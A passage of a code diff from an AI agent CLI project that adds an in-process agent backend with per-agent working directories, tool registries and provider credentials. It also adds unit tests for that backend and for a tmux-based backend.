chatHistory; + + await backend.spawnAgent(config); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + expect(agent!.config.chatHistory).toEqual(chatHistory); + }); + + it('should leave chatHistory undefined when not provided', async () => { + await backend.init(); + await 
backend.spawnAgent(createSpawnConfig('agent-1')); + + const agent = backend.getAgent('agent-1'); + expect(agent).toBeDefined(); + expect(agent!.config.chatHistory).toBeUndefined(); + }); + }); + + describe('auth isolation', () => { + it('should create per-agent ContentGenerator when authOverrides is provided', async () => { + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.authOverrides = { + authType: 'anthropic', + apiKey: 'agent-key-123', + baseUrl: 'https://agent.example.com', + }; + + await backend.spawnAgent(config); + + const mockCreate = createContentGenerator as ReturnType; + expect(mockCreate).toHaveBeenCalledWith( + expect.objectContaining({ + authType: 'anthropic', + apiKey: 'agent-key-123', + baseUrl: 'https://agent.example.com', + model: 'test-model', + }), + expect.anything(), + ); + }); + + it('should override getContentGenerator on per-agent config', async () => { + const agentGenerator = { generateContentStream: vi.fn() }; + const mockCreate = createContentGenerator as ReturnType; + mockCreate.mockResolvedValueOnce(agentGenerator); + + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.authOverrides = { + authType: 'anthropic', + apiKey: 'agent-key', + }; + + await backend.spawnAgent(config); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const lastCall = MockAgentCore.mock.calls.at(-1); + const agentContext = lastCall![1] as { + getContentGenerator: () => unknown; + getAuthType: () => string | undefined; + getModel: () => string; + }; + + expect(agentContext.getContentGenerator()).toBe(agentGenerator); + expect(agentContext.getAuthType()).toBe('anthropic'); + }); + + it('should not create per-agent ContentGenerator without authOverrides', async () => { + const mockCreate = createContentGenerator as ReturnType; + mockCreate.mockClear(); + + await backend.init(); + await backend.spawnAgent(createSpawnConfig('agent-1')); + + 
expect(mockCreate).not.toHaveBeenCalled(); + }); + + it('should fall back to parent ContentGenerator if per-agent creation fails', async () => { + const mockCreate = createContentGenerator as ReturnType; + mockCreate.mockRejectedValueOnce(new Error('Auth failed')); + + await backend.init(); + + const config = createSpawnConfig('agent-1'); + config.inProcess!.authOverrides = { + authType: 'anthropic', + apiKey: 'bad-key', + }; + + // Should not throw — falls back gracefully + await expect(backend.spawnAgent(config)).resolves.toBeUndefined(); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const lastCall = MockAgentCore.mock.calls.at(-1); + const agentContext = lastCall![1] as { + getContentGenerator: () => unknown; + }; + + // Falls back to parent's content generator + expect(agentContext.getContentGenerator()).toBe(mockContentGenerator); + }); + + it('should give different agents different ContentGenerators', async () => { + const gen1 = { generateContentStream: vi.fn() }; + const gen2 = { generateContentStream: vi.fn() }; + const mockCreate = createContentGenerator as ReturnType; + mockCreate.mockResolvedValueOnce(gen1).mockResolvedValueOnce(gen2); + + await backend.init(); + + const config1 = createSpawnConfig('agent-1'); + config1.inProcess!.authOverrides = { + authType: 'openai', + apiKey: 'key-1', + baseUrl: 'https://api1.example.com', + }; + const config2 = createSpawnConfig('agent-2'); + config2.inProcess!.authOverrides = { + authType: 'anthropic', + apiKey: 'key-2', + baseUrl: 'https://api2.example.com', + }; + + await backend.spawnAgent(config1); + await backend.spawnAgent(config2); + + const MockAgentCore = AgentCore as unknown as ReturnType; + const calls = MockAgentCore.mock.calls; + + const ctx1 = calls.at(-2)![1] as { + getContentGenerator: () => unknown; + }; + const ctx2 = calls.at(-1)![1] as { + getContentGenerator: () => unknown; + }; + + expect(ctx1.getContentGenerator()).toBe(gen1); + 
expect(ctx2.getContentGenerator()).toBe(gen2); + expect(ctx1.getContentGenerator()).not.toBe(ctx2.getContentGenerator()); + }); + }); +}); diff --git a/packages/core/src/agents/backends/InProcessBackend.ts b/packages/core/src/agents/backends/InProcessBackend.ts new file mode 100644 index 000000000..c53892cbc --- /dev/null +++ b/packages/core/src/agents/backends/InProcessBackend.ts @@ -0,0 +1,472 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview InProcessBackend — Backend implementation that runs agents + * in the current process using AgentInteractive instead of PTY subprocesses. + * + * This enables Arena to work without tmux or any external terminal multiplexer. + */ + +import { createDebugLogger } from '../../utils/debugLogger.js'; +import type { Config } from '../../config/config.js'; +import { + type AuthType, + type ContentGenerator, + type ContentGeneratorConfig, + createContentGenerator, +} from '../../core/contentGenerator.js'; +import { AUTH_ENV_MAPPINGS } from '../../models/constants.js'; +import { AgentStatus, isTerminalStatus } from '../runtime/agent-types.js'; +import { AgentCore } from '../runtime/agent-core.js'; +import { AgentEventEmitter } from '../runtime/agent-events.js'; +import { ContextState } from '../runtime/agent-headless.js'; +import { AgentInteractive } from '../runtime/agent-interactive.js'; +import type { + Backend, + AgentSpawnConfig, + AgentExitCallback, + InProcessSpawnConfig, +} from './types.js'; +import { DISPLAY_MODE } from './types.js'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import { WorkspaceContext } from '../../utils/workspaceContext.js'; +import { FileDiscoveryService } from '../../services/fileDiscoveryService.js'; +import type { ToolRegistry } from '../../tools/tool-registry.js'; + +const debugLogger = createDebugLogger('IN_PROCESS_BACKEND'); + +/** + * InProcessBackend runs agents in the current Node.js process. 
+ * + * Instead of spawning PTY subprocesses, it creates AgentCore + AgentInteractive + * instances that execute in-process. Screen capture returns null (the UI reads + * messages directly from AgentInteractive). + */ +export class InProcessBackend implements Backend { + readonly type = DISPLAY_MODE.IN_PROCESS; + + private readonly runtimeContext: Config; + private readonly agents = new Map(); + private readonly agentRegistries: ToolRegistry[] = []; + private readonly agentOrder: string[] = []; + private activeAgentId: string | null = null; + private exitCallback: AgentExitCallback | null = null; + /** Whether cleanup() has been called */ + private cleanedUp = false; + + constructor(runtimeContext: Config) { + this.runtimeContext = runtimeContext; + } + + // ─── Backend Interface ───────────────────────────────────── + + async init(): Promise { + debugLogger.info('InProcessBackend initialized'); + } + + async spawnAgent(config: AgentSpawnConfig): Promise { + const inProcessConfig = config.inProcess; + if (!inProcessConfig) { + throw new Error( + `InProcessBackend requires inProcess config for agent ${config.agentId}`, + ); + } + + if (this.agents.has(config.agentId)) { + throw new Error(`Agent "${config.agentId}" already exists.`); + } + + const { promptConfig, modelConfig, runConfig, toolConfig } = + inProcessConfig.runtimeConfig; + + const eventEmitter = new AgentEventEmitter(); + + // Build a per-agent runtime context with isolated working directory, + // target directory, workspace context, tool registry, and (optionally) + // a dedicated ContentGenerator for per-agent auth isolation. 
+ const agentContext = await createPerAgentConfig( + this.runtimeContext, + config.cwd, + inProcessConfig.runtimeConfig.modelConfig.model, + inProcessConfig.authOverrides, + ); + + this.agentRegistries.push(agentContext.getToolRegistry()); + + const core = new AgentCore( + inProcessConfig.agentName, + agentContext, + promptConfig, + modelConfig, + runConfig, + toolConfig, + eventEmitter, + ); + + const interactive = new AgentInteractive( + { + agentId: config.agentId, + agentName: inProcessConfig.agentName, + initialTask: inProcessConfig.initialTask, + maxTurnsPerMessage: runConfig.max_turns, + maxTimeMinutesPerMessage: runConfig.max_time_minutes, + chatHistory: inProcessConfig.chatHistory, + }, + core, + ); + + this.agents.set(config.agentId, interactive); + this.agentOrder.push(config.agentId); + + // Set first agent as active + if (this.activeAgentId === null) { + this.activeAgentId = config.agentId; + } + + try { + const context = new ContextState(); + await interactive.start(context); + + // Watch for completion and fire exit callback — but only for + // truly terminal statuses. IDLE means the agent is still alive + // and can accept follow-up messages. + void interactive.waitForCompletion().then(() => { + const status = interactive.getStatus(); + if (!isTerminalStatus(status)) { + return; + } + const exitCode = + status === AgentStatus.COMPLETED + ? 0 + : status === AgentStatus.FAILED + ? 
1 + : null; + this.exitCallback?.(config.agentId, exitCode, null); + }); + + debugLogger.info(`Spawned in-process agent: ${config.agentId}`); + } catch (error) { + debugLogger.error( + `Failed to start in-process agent "${config.agentId}":`, + error, + ); + this.exitCallback?.(config.agentId, 1, null); + } + } + + stopAgent(agentId: string): void { + const agent = this.agents.get(agentId); + if (agent) { + agent.abort(); + debugLogger.info(`Stopped agent: ${agentId}`); + } + } + + stopAll(): void { + for (const agent of this.agents.values()) { + agent.abort(); + } + debugLogger.info('Stopped all in-process agents'); + } + + async cleanup(): Promise { + this.cleanedUp = true; + + for (const agent of this.agents.values()) { + agent.abort(); + } + // Wait for loops to settle, but cap at 3s so CLI exit isn't blocked + // if an agent's reasoning loop doesn't terminate promptly after abort. + const CLEANUP_TIMEOUT_MS = 3000; + const promises = Array.from(this.agents.values()).map((a) => + a.waitForCompletion().catch(() => {}), + ); + let timerId: ReturnType; + const timeout = new Promise((resolve) => { + timerId = setTimeout(resolve, CLEANUP_TIMEOUT_MS); + }); + await Promise.race([Promise.allSettled(promises), timeout]); + clearTimeout(timerId!); + + // Stop per-agent tool registries so tools like TaskTool can release + // listeners registered on shared managers (e.g. SubagentManager). 
+ for (const registry of this.agentRegistries) { + await registry.stop().catch(() => {}); + } + this.agentRegistries.length = 0; + + this.agents.clear(); + this.agentOrder.length = 0; + this.activeAgentId = null; + debugLogger.info('InProcessBackend cleaned up'); + } + + setOnAgentExit(callback: AgentExitCallback): void { + this.exitCallback = callback; + } + + async waitForAll(timeoutMs?: number): Promise { + if (this.cleanedUp) return true; + + const promises = Array.from(this.agents.values()).map((a) => + a.waitForCompletion(), + ); + + if (timeoutMs === undefined) { + await Promise.allSettled(promises); + return true; + } + + let timerId: ReturnType; + const timeout = new Promise<'timeout'>((resolve) => { + timerId = setTimeout(() => resolve('timeout'), timeoutMs); + }); + + const result = await Promise.race([ + Promise.allSettled(promises).then(() => 'done' as const), + timeout, + ]); + + clearTimeout(timerId!); + return result === 'done'; + } + + // ─── Navigation ──────────────────────────────────────────── + + switchTo(agentId: string): void { + if (this.agents.has(agentId)) { + this.activeAgentId = agentId; + } + } + + switchToNext(): void { + this.activeAgentId = this.navigate(1); + } + + switchToPrevious(): void { + this.activeAgentId = this.navigate(-1); + } + + getActiveAgentId(): string | null { + return this.activeAgentId; + } + + // ─── Screen Capture (no-op for in-process) ───────────────── + + getActiveSnapshot(): AnsiOutput | null { + return null; + } + + getAgentSnapshot( + _agentId: string, + _scrollOffset?: number, + ): AnsiOutput | null { + return null; + } + + getAgentScrollbackLength(_agentId: string): number { + return 0; + } + + // ─── Input ───────────────────────────────────────────────── + + forwardInput(data: string): boolean { + if (!this.activeAgentId) return false; + return this.writeToAgent(this.activeAgentId, data); + } + + writeToAgent(agentId: string, data: string): boolean { + const agent = this.agents.get(agentId); + if 
(!agent) return false; + + agent.enqueueMessage(data); + return true; + } + + // ─── Resize (no-op) ─────────────────────────────────────── + + resizeAll(_cols: number, _rows: number): void { + // No terminals to resize in-process + } + + // ─── External Session ────────────────────────────────────── + + getAttachHint(): string | null { + return null; + } + + // ─── Extra: Direct Access ────────────────────────────────── + + /** + * Get an AgentInteractive instance by agent ID. + * Used by ArenaManager for direct event subscription. + */ + getAgent(agentId: string): AgentInteractive | undefined { + return this.agents.get(agentId); + } + + // ─── Private ─────────────────────────────────────────────── + + private navigate(direction: 1 | -1): string | null { + if (this.agentOrder.length === 0) return null; + if (!this.activeAgentId) return this.agentOrder[0] ?? null; + + const currentIndex = this.agentOrder.indexOf(this.activeAgentId); + if (currentIndex === -1) return this.agentOrder[0] ?? null; + + const nextIndex = + (currentIndex + direction + this.agentOrder.length) % + this.agentOrder.length; + return this.agentOrder[nextIndex] ?? 
null; + } +} + +/** + * Create a per-agent Config that delegates to the shared base Config but + * overrides key methods to provide per-agent isolation: + * + * - `getWorkingDir()` / `getTargetDir()` → agent's worktree cwd + * - `getWorkspaceContext()` → WorkspaceContext rooted at agent's cwd + * - `getFileService()` → FileDiscoveryService rooted at agent's cwd + * (so .qwenignore checks resolve against the agent's worktree) + * - `getToolRegistry()` → per-agent tool registry with core tools bound to + * the agent Config (so tools resolve paths against the agent's worktree) + * - `getContentGenerator()` / `getContentGeneratorConfig()` / `getAuthType()` + * → per-agent ContentGenerator when `authOverrides` is provided, enabling + * agents to target different model providers in the same Arena session + * + * Uses prototypal delegation so all other Config methods/properties resolve + * against the original instance transparently. + */ +async function createPerAgentConfig( + base: Config, + cwd: string, + modelId?: string, + authOverrides?: InProcessSpawnConfig['authOverrides'], +): Promise { + // eslint-disable-next-line @typescript-eslint/no-explicit-any + const override = Object.create(base) as any; + + override.getWorkingDir = () => cwd; + override.getTargetDir = () => cwd; + override.getProjectRoot = () => cwd; + + const agentWorkspace = new WorkspaceContext(cwd); + override.getWorkspaceContext = () => agentWorkspace; + + const agentFileService = new FileDiscoveryService(cwd); + override.getFileService = () => agentFileService; + + // Build a per-agent tool registry: core tools are constructed with + // the per-agent Config so they resolve paths against cwd. Discovered + // (MCP/command) tools are copied from the parent registry as-is. 
+ const agentRegistry: ToolRegistry = await override.createToolRegistry( + undefined, + { skipDiscovery: true }, + ); + agentRegistry.copyDiscoveredToolsFrom(base.getToolRegistry()); + override.getToolRegistry = () => agentRegistry; + + // Build a per-agent ContentGenerator when auth overrides are provided. + // This enables Arena agents to use different providers (OpenAI, Anthropic, + // Gemini, etc.) than the parent process. + if (authOverrides?.authType) { + try { + const agentGeneratorConfig = buildAgentContentGeneratorConfig( + base, + modelId, + authOverrides, + ); + const agentGenerator = await createContentGenerator( + agentGeneratorConfig, + override as Config, + ); + override.getContentGenerator = (): ContentGenerator => agentGenerator; + override.getContentGeneratorConfig = (): ContentGeneratorConfig => + agentGeneratorConfig; + override.getAuthType = (): AuthType | undefined => + agentGeneratorConfig.authType; + override.getModel = (): string => agentGeneratorConfig.model; + + debugLogger.info( + `Created per-agent ContentGenerator: authType=${authOverrides.authType}, model=${agentGeneratorConfig.model}`, + ); + } catch (error) { + debugLogger.error( + 'Failed to create per-agent ContentGenerator, falling back to parent:', + error, + ); + } + } + + return override as Config; +} + +/** + * Build a ContentGeneratorConfig for a per-agent ContentGenerator. + * Inherits operational settings (timeout, retries, proxy, sampling, etc.) + * from the parent's config and overlays the agent-specific auth fields. + * + * For cross-provider agents the parent's API key / base URL are invalid, + * so we resolve credentials from the provider-specific environment + * variables (e.g. ANTHROPIC_API_KEY, ANTHROPIC_BASE_URL). This mirrors + * what a PTY subprocess does during its own initialization. 
+ */ +function buildAgentContentGeneratorConfig( + base: Config, + modelId: string | undefined, + authOverrides: NonNullable, +): ContentGeneratorConfig { + const parentConfig = base.getContentGeneratorConfig(); + const sameProvider = authOverrides.authType === parentConfig.authType; + + const resolvedApiKey = resolveCredentialField( + authOverrides.apiKey, + sameProvider ? parentConfig.apiKey : undefined, + authOverrides.authType, + 'apiKey', + ); + + const resolvedBaseUrl = resolveCredentialField( + authOverrides.baseUrl, + sameProvider ? parentConfig.baseUrl : undefined, + authOverrides.authType, + 'baseUrl', + ); + + return { + ...parentConfig, + model: modelId ?? parentConfig.model, + authType: authOverrides.authType as AuthType, + apiKey: resolvedApiKey, + baseUrl: resolvedBaseUrl, + }; +} + +/** + * Resolve a credential field (apiKey or baseUrl) with the following + * priority: explicit override → same-provider parent value → env var. + */ +function resolveCredentialField( + explicitValue: string | undefined, + inheritedValue: string | undefined, + authType: string, + field: 'apiKey' | 'baseUrl', +): string | undefined { + if (explicitValue) return explicitValue; + if (inheritedValue) return inheritedValue; + + const envMapping = + AUTH_ENV_MAPPINGS[authType as keyof typeof AUTH_ENV_MAPPINGS]; + if (!envMapping) return undefined; + + for (const envKey of envMapping[field]) { + const value = process.env[envKey]; + if (value) return value; + } + return undefined; +} diff --git a/packages/core/src/agents/backends/TmuxBackend.test.ts b/packages/core/src/agents/backends/TmuxBackend.test.ts new file mode 100644 index 000000000..39a96785d --- /dev/null +++ b/packages/core/src/agents/backends/TmuxBackend.test.ts @@ -0,0 +1,482 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import type { AgentSpawnConfig } from './types.js'; + +// ─── Hoisted 
mocks for tmux-commands ──────────────────────────── +const hoistedVerifyTmux = vi.hoisted(() => vi.fn()); +const hoistedTmuxCurrentPaneId = vi.hoisted(() => vi.fn()); +const hoistedTmuxCurrentWindowTarget = vi.hoisted(() => vi.fn()); +const hoistedTmuxHasSession = vi.hoisted(() => vi.fn()); +const hoistedTmuxHasWindow = vi.hoisted(() => vi.fn()); +const hoistedTmuxNewSession = vi.hoisted(() => vi.fn()); +const hoistedTmuxNewWindow = vi.hoisted(() => vi.fn()); +const hoistedTmuxSplitWindow = vi.hoisted(() => vi.fn()); +const hoistedTmuxSendKeys = vi.hoisted(() => vi.fn()); +const hoistedTmuxSelectPane = vi.hoisted(() => vi.fn()); +const hoistedTmuxSelectPaneTitle = vi.hoisted(() => vi.fn()); +const hoistedTmuxSelectPaneStyle = vi.hoisted(() => vi.fn()); +const hoistedTmuxSelectLayout = vi.hoisted(() => vi.fn()); +const hoistedTmuxListPanes = vi.hoisted(() => vi.fn()); +const hoistedTmuxSetOption = vi.hoisted(() => vi.fn()); +const hoistedTmuxRespawnPane = vi.hoisted(() => vi.fn()); +const hoistedTmuxKillPane = vi.hoisted(() => vi.fn()); +const hoistedTmuxKillSession = vi.hoisted(() => vi.fn()); +const hoistedTmuxResizePane = vi.hoisted(() => vi.fn()); +const hoistedTmuxGetFirstPaneId = vi.hoisted(() => vi.fn()); + +vi.mock('./tmux-commands.js', () => ({ + verifyTmux: hoistedVerifyTmux, + tmuxCurrentPaneId: hoistedTmuxCurrentPaneId, + tmuxCurrentWindowTarget: hoistedTmuxCurrentWindowTarget, + tmuxHasSession: hoistedTmuxHasSession, + tmuxHasWindow: hoistedTmuxHasWindow, + tmuxNewSession: hoistedTmuxNewSession, + tmuxNewWindow: hoistedTmuxNewWindow, + tmuxSplitWindow: hoistedTmuxSplitWindow, + tmuxSendKeys: hoistedTmuxSendKeys, + tmuxSelectPane: hoistedTmuxSelectPane, + tmuxSelectPaneTitle: hoistedTmuxSelectPaneTitle, + tmuxSelectPaneStyle: hoistedTmuxSelectPaneStyle, + tmuxSelectLayout: hoistedTmuxSelectLayout, + tmuxListPanes: hoistedTmuxListPanes, + tmuxSetOption: hoistedTmuxSetOption, + tmuxRespawnPane: hoistedTmuxRespawnPane, + tmuxKillPane: hoistedTmuxKillPane, 
+ tmuxKillSession: hoistedTmuxKillSession, + tmuxResizePane: hoistedTmuxResizePane, + tmuxGetFirstPaneId: hoistedTmuxGetFirstPaneId, +})); + +// Mock the debug logger +vi.mock('../../utils/debugLogger.js', () => ({ + createDebugLogger: () => ({ + info: vi.fn(), + error: vi.fn(), + warn: vi.fn(), + }), +})); + +import { TmuxBackend } from './TmuxBackend.js'; + +function makeConfig( + agentId: string, + overrides?: Partial, +): AgentSpawnConfig { + return { + agentId, + command: '/usr/bin/node', + args: ['agent.js'], + cwd: '/tmp/test', + ...overrides, + }; +} + +/** + * Spawn an agent with fake timers active. The `sleep()` inside + * `spawnAgentAsync` uses `setTimeout`, so we must advance fake timers + * while the spawn promise is pending. + */ +async function spawnWithTimers( + backend: TmuxBackend, + config: AgentSpawnConfig, +): Promise { + const promise = backend.spawnAgent(config); + // Advance past INTERNAL_LAYOUT_SETTLE_MS (200) / EXTERNAL_LAYOUT_SETTLE_MS (120) + // and the 100ms triggerMainProcessRedraw timeout + await vi.advanceTimersByTimeAsync(300); + await promise; +} + +function setupDefaultMocks(): void { + hoistedVerifyTmux.mockResolvedValue(undefined); + hoistedTmuxHasSession.mockResolvedValue(false); + hoistedTmuxHasWindow.mockResolvedValue(false); + hoistedTmuxNewSession.mockResolvedValue(undefined); + hoistedTmuxNewWindow.mockResolvedValue(undefined); + hoistedTmuxGetFirstPaneId.mockResolvedValue('%0'); + hoistedTmuxRespawnPane.mockResolvedValue(undefined); + hoistedTmuxSplitWindow.mockResolvedValue('%1'); + hoistedTmuxSetOption.mockResolvedValue(undefined); + hoistedTmuxSelectPaneTitle.mockResolvedValue(undefined); + hoistedTmuxSelectPaneStyle.mockResolvedValue(undefined); + hoistedTmuxSelectLayout.mockResolvedValue(undefined); + hoistedTmuxSelectPane.mockResolvedValue(undefined); + hoistedTmuxResizePane.mockResolvedValue(undefined); + hoistedTmuxListPanes.mockResolvedValue([]); + hoistedTmuxSendKeys.mockResolvedValue(undefined); + 
hoistedTmuxKillPane.mockResolvedValue(undefined); + hoistedTmuxKillSession.mockResolvedValue(undefined); + hoistedTmuxCurrentPaneId.mockResolvedValue('%0'); + hoistedTmuxCurrentWindowTarget.mockResolvedValue('main:0'); +} + +describe('TmuxBackend', () => { + let backend: TmuxBackend; + let savedTmuxEnv: string | undefined; + + beforeEach(() => { + vi.useFakeTimers(); + savedTmuxEnv = process.env['TMUX']; + // Default: running outside tmux + delete process.env['TMUX']; + setupDefaultMocks(); + backend = new TmuxBackend(); + }); + + afterEach(async () => { + await backend.cleanup(); + vi.restoreAllMocks(); + vi.useRealTimers(); + if (savedTmuxEnv !== undefined) { + process.env['TMUX'] = savedTmuxEnv; + } else { + delete process.env['TMUX']; + } + }); + + // ─── Initialization ───────────────────────────────────────── + + it('throws if spawnAgent is called before init', async () => { + await expect(backend.spawnAgent(makeConfig('a1'))).rejects.toThrow( + 'not initialized', + ); + }); + + it('init verifies tmux availability', async () => { + await backend.init(); + expect(hoistedVerifyTmux).toHaveBeenCalled(); + }); + + it('init is idempotent', async () => { + await backend.init(); + await backend.init(); + expect(hoistedVerifyTmux).toHaveBeenCalledTimes(1); + }); + + // ─── Spawning (outside tmux) ────────────────────────────── + + it('spawns first agent outside tmux by respawning the initial pane', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('agent-1')); + + expect(hoistedTmuxNewSession).toHaveBeenCalled(); + expect(hoistedTmuxRespawnPane).toHaveBeenCalledWith( + '%0', + expect.any(String), + expect.any(String), + ); + expect(backend.getActiveAgentId()).toBe('agent-1'); + }); + + it('spawns second agent outside tmux by splitting', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('agent-1')); + + // For second agent, list-panes returns the first agent pane + hoistedTmuxListPanes.mockResolvedValue([ 
+ { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%2'); + + await spawnWithTimers(backend, makeConfig('agent-2')); + + expect(hoistedTmuxSplitWindow).toHaveBeenCalled(); + }); + + it('rejects duplicate agent IDs', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('dup')); + + await expect(backend.spawnAgent(makeConfig('dup'))).rejects.toThrow( + 'already exists', + ); + }); + + // ─── Spawning (inside tmux) ─────────────────────────────── + + it('spawns first agent inside tmux by splitting from main pane', async () => { + process.env['TMUX'] = '/tmp/tmux-1000/default,12345,0'; + backend = new TmuxBackend(); + await backend.init(); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%1'); + + await spawnWithTimers(backend, makeConfig('agent-1')); + + // Should have split horizontally with firstSplitPercent + expect(hoistedTmuxSplitWindow).toHaveBeenCalledWith( + '%0', + expect.objectContaining({ horizontal: true, percent: 70 }), + ); + // Should refocus on main pane (inside tmux, no server name arg) + expect(hoistedTmuxSelectPane).toHaveBeenCalledWith('%0'); + }); + + // ─── Navigation ─────────────────────────────────────────── + + it('switchTo changes active agent', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%2'); + await spawnWithTimers(backend, makeConfig('b')); + + backend.switchTo('b'); + expect(backend.getActiveAgentId()).toBe('b'); + }); + + it('switchTo throws for unknown agent', async () => { + await backend.init(); + expect(() => backend.switchTo('ghost')).toThrow('not found'); + }); + + it('switchToNext and switchToPrevious cycle correctly', async () => { + await backend.init(); + await 
spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%2'); + await spawnWithTimers(backend, makeConfig('b')); + + expect(backend.getActiveAgentId()).toBe('a'); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('b'); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('a'); + backend.switchToPrevious(); + expect(backend.getActiveAgentId()).toBe('b'); + }); + + it('switchToNext does nothing with a single agent', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('solo')); + backend.switchToNext(); + expect(backend.getActiveAgentId()).toBe('solo'); + }); + + // ─── Stop & Cleanup ────────────────────────────────────── + + it('stopAgent kills the pane', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + backend.stopAgent('a'); + expect(hoistedTmuxKillPane).toHaveBeenCalledWith('%0', expect.any(String)); + }); + + it('stopAll kills all running panes', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%2'); + await spawnWithTimers(backend, makeConfig('b')); + + backend.stopAll(); + // Should have killed both panes + expect(hoistedTmuxKillPane).toHaveBeenCalledTimes(2); + }); + + it('cleanup kills panes and the external session', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + await backend.cleanup(); + + expect(hoistedTmuxKillPane).toHaveBeenCalledWith('%0', expect.any(String)); + expect(hoistedTmuxKillSession).toHaveBeenCalled(); + expect(backend.getActiveAgentId()).toBeNull(); + }); + + it('cleanup does not kill session when running inside tmux', async () => { + process.env['TMUX'] = 
'/tmp/tmux-1000/default,12345,0'; + backend = new TmuxBackend(); + await backend.init(); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + hoistedTmuxSplitWindow.mockResolvedValue('%1'); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxKillSession.mockClear(); + await backend.cleanup(); + + expect(hoistedTmuxKillSession).not.toHaveBeenCalled(); + }); + + // ─── Exit Detection (Bug #1: missing pane → exited) ────── + + it('marks agent as exited when pane disappears from tmux', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + // Polling returns no panes → agent's pane is gone + hoistedTmuxListPanes.mockResolvedValue([]); + + // Advance timer to trigger poll + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 1, null); + }); + + it('marks agent as exited when pane reports dead', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + // Polling returns the pane as dead with exit code 42 + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: true, deadStatus: 42 }, + ]); + + await vi.advanceTimersByTimeAsync(600); + + expect(exitCallback).toHaveBeenCalledWith('a', 42, null); + }); + + // ─── waitForAll (Bug #3: cleanup resolves waiters) ──────── + + it('waitForAll resolves when all agents exit', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: true, deadStatus: 0 }, + ]); + + const waitPromise = backend.waitForAll(); + + await vi.advanceTimersByTimeAsync(600); + + const result = await waitPromise; + expect(result).toBe(true); + }); + + it('waitForAll resolves after cleanup is called', async () => { + await 
backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + // Pane stays alive — without cleanup, waitForAll would hang + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + + const waitPromise = backend.waitForAll(); + + // Advance a bit (poll runs but agent still alive) + await vi.advanceTimersByTimeAsync(600); + + // Now cleanup + await backend.cleanup(); + + // Advance again so the waitForAll interval fires + await vi.advanceTimersByTimeAsync(600); + + const result = await waitPromise; + // The key thing is the promise resolves instead of hanging forever. + // allExited() returns true since panes were cleared in cleanup. + expect(result).toBe(true); + }); + + it('waitForAll returns false on timeout', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + // Pane stays alive + hoistedTmuxListPanes.mockResolvedValue([ + { paneId: '%0', dead: false, deadStatus: 0 }, + ]); + + const waitPromise = backend.waitForAll(1000); + + await vi.advanceTimersByTimeAsync(1100); + + const result = await waitPromise; + expect(result).toBe(false); + }); + + // ─── Input ──────────────────────────────────────────────── + + it('forwardInput sends literal keys to active agent pane', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + + const result = backend.forwardInput('hello'); + expect(result).toBe(true); + expect(hoistedTmuxSendKeys).toHaveBeenCalledWith( + '%0', + 'hello', + { literal: true }, + expect.any(String), + ); + }); + + it('forwardInput returns false with no active agent', async () => { + await backend.init(); + expect(backend.forwardInput('hello')).toBe(false); + }); + + // ─── Snapshots ──────────────────────────────────────────── + + it('getActiveSnapshot returns null (tmux handles rendering)', async () => { + await backend.init(); + await spawnWithTimers(backend, makeConfig('a')); + expect(backend.getActiveSnapshot()).toBeNull(); + 
